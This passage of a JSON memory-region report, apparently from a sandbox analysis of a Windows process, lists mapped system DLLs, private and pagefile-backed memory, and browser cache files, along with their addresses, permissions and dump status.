"info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_185", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2166783, "entry_point": 0, "filename": null, "id": "region_1243", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:07.362", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 512000, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3919871, "entry_point": 3460808, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_1244", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 3407872, "timestamp": "00:01:07.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791719804928, "type": "region", "version": 1 }, "end_va": 8791720157183, "entry_point": 8791719852992, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_1246", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791719804928, "timestamp": "00:01:07.367", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001247-addr_0x0000000002070000-size_0x0000000000200000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_186", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2097152, "start_va": 34013184, "type": "region", "version": 1 }, "end_va": 36110335, "entry_point": 0, "filename": null, "id": "region_1247", "name": "private_0x0000000002070000", "norm_filename": null, "region_type": "private_memory", "start_va": 34013184, "timestamp": "00:01:07.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 31391744, "type": "region", "version": 1 }, "end_va": 32305151, "entry_point": 0, "filename": null, "id": "region_1252", "name": "pagefile_0x0000000001df0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31391744, "timestamp": "00:01:07.410", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791715741696, "type": "region", "version": 1 }, "end_va": 8791715839999, "entry_point": 8791715746096, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_1253", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 8791715741696, "timestamp": "00:01:07.414", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 36110336, "type": "region", "version": 1 }, "end_va": 39055359, "entry_point": 36110336, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1254", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 36110336, "timestamp": "00:01:07.419", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 8791738548224, "type": "region", "version": 1 }, "end_va": 8791738732543, "entry_point": 8791738552336, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_1255", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 8791738548224, "timestamp": "00:01:07.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 8791772823552, "type": "region", "version": 1 }, "end_va": 8791773159423, "entry_point": 8791772827860, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_1256", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 8791772823552, "timestamp": "00:01:07.423", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3420160, "start_va": 39059456, "type": "region", "version": 1 }, "end_va": 42479615, "entry_point": 0, "filename": null, "id": "region_1257", "name": "pagefile_0x0000000002540000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 39059456, "timestamp": "00:01:07.425", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 8791754080256, "type": "region", "version": 1 }, "end_va": 8791754231807, "entry_point": 8791754118744, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_1258", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 8791754080256, "timestamp": "00:01:07.426", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791773216768, "type": "region", "version": 1 }, "end_va": 8791787405311, "entry_point": 8791773728444, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1259", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791773216768, "timestamp": "00:01:07.429", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2232319, "entry_point": 0, "filename": null, "id": "region_1260", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:01:07.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791755390976, "type": "region", "version": 1 }, "end_va": 8791755452415, "entry_point": 8791755397552, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_1261", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791755390976, "timestamp": "00:01:07.434", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2342911, "entry_point": 2293760, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_1262", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 2293760, "timestamp": "00:01:07.443", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3440639, "entry_point": 3407872, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_1263", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 3407872, "timestamp": "00:01:07.444", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 3538943, "entry_point": 3473408, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_1264", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 3473408, "timestamp": "00:01:07.445", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3801087, "entry_point": 3538944, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat", "id": "region_1265", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat", "region_type": "memory_mapped_file", "start_va": 3538944, "timestamp": "00:01:07.447", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 3805183, "entry_point": 0, "filename": null, "id": "region_1266", "name": "pagefile_0x00000000003a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3801088, "timestamp": "00:01:07.457", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791770071040, "type": "region", "version": 1 }, "end_va": 8791770697727, "entry_point": 8791770078224, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_1281", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791770071040, "timestamp": "00:01:07.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3870719, "entry_point": 0, "filename": null, "id": "region_1282", "name": "pagefile_0x00000000003b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3866624, "timestamp": "00:01:07.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3936255, "entry_point": 3932160, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_1283", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 3932160, "timestamp": "00:01:07.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4005887, "entry_point": 0, "filename": null, "id": "region_1284", "name": "pagefile_0x00000000003d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3997696, "timestamp": "00:01:07.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2048000, "start_va": 8791731339264, "type": "region", "version": 1 }, "end_va": 8791733387263, "entry_point": 8791732963620, "filename": "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "id": "region_1285", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 8791731339264, "timestamp": "00:01:07.523", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4071423, "entry_point": 0, "filename": null, "id": "region_1287", "name": "pagefile_0x00000000003e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4063232, "timestamp": "00:01:07.526", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3936255, "entry_point": 0, "filename": null, "id": "region_1288", "name": "pagefile_0x00000000003c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3932160, "timestamp": "00:01:07.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4136959, "entry_point": 0, "filename": null, "id": "region_1289", "name": "pagefile_0x00000000003f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4128768, "timestamp": "00:01:07.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 315392, "start_va": 8791770726400, "type": "region", "version": 1 }, "end_va": 8791771041791, "entry_point": 8791770730608, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_1290", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 8791770726400, "timestamp": "00:01:07.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 8791791501312, "type": "region", "version": 1 }, "end_va": 8791791534079, "entry_point": 8791791506692, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_1291", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 8791791501312, "timestamp": "00:01:07.607", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001292-addr_0x0000000002890000-size_0x00000000001f0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_191", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2031616, "start_va": 42532864, "type": "region", "version": 1 }, "end_va": 44564479, "entry_point": 0, "filename": null, "id": "region_1292", "name": "private_0x0000000002890000", "norm_filename": null, "region_type": "private_memory", "start_va": 42532864, "timestamp": "00:01:07.609", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 372736, "start_va": 8791746019328, "type": "region", "version": 1 }, "end_va": 8791746392063, "entry_point": 8791746046272, "filename": "\\Windows\\System32\\dnsapi.dll", "id": "region_1293", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\system32\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 8791746019328, "timestamp": "00:01:07.613", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001294-addr_0x0000000002a80000-size_0x0000000000240000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_192", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2359296, "start_va": 44564480, "type": "region", "version": 1 }, "end_va": 46923775, "entry_point": 0, "filename": null, "id": "region_1294", "name": "private_0x0000000002a80000", "norm_filename": null, "region_type": "private_memory", "start_va": 44564480, "timestamp": "00:01:07.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 8791728717824, "type": "region", "version": 1 }, "end_va": 8791728877567, "entry_point": 8791728756924, "filename": "\\Windows\\System32\\IPHLPAPI.DLL", "id": "region_1295", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\system32\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 8791728717824, "timestamp": "00:01:07.618", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791728652288, "type": "region", "version": 1 }, "end_va": 8791728697343, "entry_point": 8791728656792, "filename": "\\Windows\\System32\\winnsi.dll", "id": "region_1296", "name": "winnsi.dll", "norm_filename": "c:\\windows\\system32\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 8791728652288, "timestamp": "00:01:07.619", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 42598400, "type": "region", "version": 1 }, "end_va": 43646975, "entry_point": 0, "filename": null, "id": "region_1297", "name": "private_0x00000000028a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42598400, "timestamp": "00:01:07.622", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001298-addr_0x0000000002a00000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_193", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 44040192, "type": "region", "version": 1 }, "end_va": 44564479, "entry_point": 0, "filename": null, "id": "region_1298", "name": "private_0x0000000002a00000", "norm_filename": null, "region_type": "private_memory", "start_va": 44040192, "timestamp": "00:01:07.623", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001299-addr_0x000007fffffda000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_194", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092866560, "type": "region", "version": 1 }, "end_va": 8796092874751, "entry_point": 0, "filename": null, "id": "region_1299", "name": "private_0x000007fffffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092866560, "timestamp": "00:01:07.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 401408, "start_va": 8791581523968, "type": "region", "version": 1 }, "end_va": 8791581925375, "entry_point": 8791581528472, "filename": "\\Windows\\System32\\rasapi32.dll", "id": "region_1300", "name": "rasapi32.dll", "norm_filename": "c:\\windows\\system32\\rasapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791581523968, "timestamp": "00:01:07.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 8791581392896, "type": "region", "version": 1 }, "end_va": 8791581507583, "entry_point": 8791581397408, "filename": "\\Windows\\System32\\rasman.dll", "id": "region_1301", "name": "rasman.dll", "norm_filename": "c:\\windows\\system32\\rasman.dll", "region_type": "memory_mapped_file", "start_va": 8791581392896, "timestamp": "00:01:07.625", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 8791711809536, "type": "region", "version": 1 }, "end_va": 8791711879167, "entry_point": 8791711814848, "filename": "\\Windows\\System32\\rtutils.dll", "id": "region_1302", "name": "rtutils.dll", "norm_filename": "c:\\windows\\system32\\rtutils.dll", "region_type": "memory_mapped_file", "start_va": 8791711809536, "timestamp": "00:01:07.627", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 34144256, "type": "region", "version": 1 }, "end_va": 35192831, "entry_point": 0, "filename": null, "id": "region_1327", "name": "private_0x0000000002090000", "norm_filename": null, "region_type": "private_memory", "start_va": 34144256, "timestamp": "00:01:07.665", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001328-addr_0x00000000021f0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_204", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 35586048, "type": "region", "version": 1 }, "end_va": 36110335, "entry_point": 0, "filename": null, "id": "region_1328", "name": "private_0x00000000021f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35586048, "timestamp": "00:01:07.665", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001329-addr_0x000007fffffd8000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_205", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092858368, "type": "region", "version": 1 }, "end_va": 8796092866559, "entry_point": 0, "filename": null, "id": "region_1329", "name": "private_0x000007fffffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092858368, "timestamp": "00:01:07.665", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001330-addr_0x0000000000610000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_206", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 6356992, "type": "region", "version": 1 }, "end_va": 6361087, "entry_point": 0, "filename": null, "id": "region_1330", "name": "private_0x0000000000610000", "norm_filename": null, "region_type": "private_memory", "start_va": 6356992, "timestamp": "00:01:07.667", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 6356992, "type": "region", "version": 1 }, "end_va": 6361087, "entry_point": 0, "filename": null, "id": "region_1331", "name": "pagefile_0x0000000000610000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6356992, "timestamp": "00:01:07.667", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 8791636770816, "type": "region", "version": 1 }, "end_va": 8791636807679, "entry_point": 8791636776116, "filename": "\\Windows\\System32\\SensApi.dll", "id": "region_1332", "name": "sensapi.dll", "norm_filename": "c:\\windows\\system32\\sensapi.dll", "region_type": "memory_mapped_file", "start_va": 8791636770816, "timestamp": "00:01:07.669", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 47906816, "type": "region", "version": 1 }, "end_va": 48955391, "entry_point": 0, "filename": null, "id": "region_1333", "name": "private_0x0000000002db0000", "norm_filename": null, "region_type": "private_memory", "start_va": 47906816, "timestamp": "00:01:07.686", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001334-addr_0x000007fffffd4000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_207", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092841984, "type": "region", "version": 1 }, "end_va": 8796092850175, "entry_point": 0, "filename": null, "id": "region_1334", "name": "private_0x000007fffffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092841984, "timestamp": "00:01:07.687", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 8791730356224, "type": "region", "version": 1 }, "end_va": 8791730442239, "entry_point": 8791730381016, "filename": "\\Windows\\System32\\nlaapi.dll", "id": "region_1335", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\system32\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 8791730356224, "timestamp": "00:01:07.689", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001336-addr_0x0000000002a80000-size_0x0000000000170000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_208", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1507328, "start_va": 44564480, "type": "region", "version": 1 }, "end_va": 46071807, "entry_point": 0, "filename": null, "id": "region_1336", "name": "private_0x0000000002a80000", "norm_filename": null, "region_type": "private_memory", "start_va": 44564480, "timestamp": "00:01:07.692", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001337-addr_0x0000000002c40000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_209", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 46399488, "type": "region", "version": 1 }, "end_va": 46923775, "entry_point": 0, "filename": null, "id": "region_1337", "name": "private_0x0000000002c40000", "norm_filename": null, "region_type": "private_memory", "start_va": 46399488, "timestamp": "00:01:07.693", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001338-addr_0x0000000002eb0000-size_0x00000000001d0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_210", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1900544, "start_va": 48955392, "type": "region", "version": 1 }, "end_va": 50855935, "entry_point": 0, "filename": null, "id": "region_1338", "name": "private_0x0000000002eb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 48955392, "timestamp": "00:01:07.694", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001339-addr_0x0000000000620000-size_0x00000000000a0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_211", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 6422528, "type": "region", "version": 1 }, "end_va": 7077887, "entry_point": 0, "filename": null, "id": "region_1339", "name": "private_0x0000000000620000", "norm_filename": null, "region_type": "private_memory", "start_va": 6422528, "timestamp": "00:01:07.695", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 8791603871744, "type": "region", "version": 1 }, "end_va": 8791603904511, "entry_point": 8791603876884, "filename": "\\Windows\\System32\\rasadhlp.dll", "id": "region_1343", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\system32\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 8791603871744, "timestamp": "00:01:07.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 49676288, "type": "region", "version": 1 }, "end_va": 50724863, "entry_point": 0, "filename": null, "id": "region_1344", "name": "private_0x0000000002f60000", "norm_filename": null, "region_type": "private_memory", "start_va": 49676288, "timestamp": "00:01:07.743", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001345-addr_0x0000000003070000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": 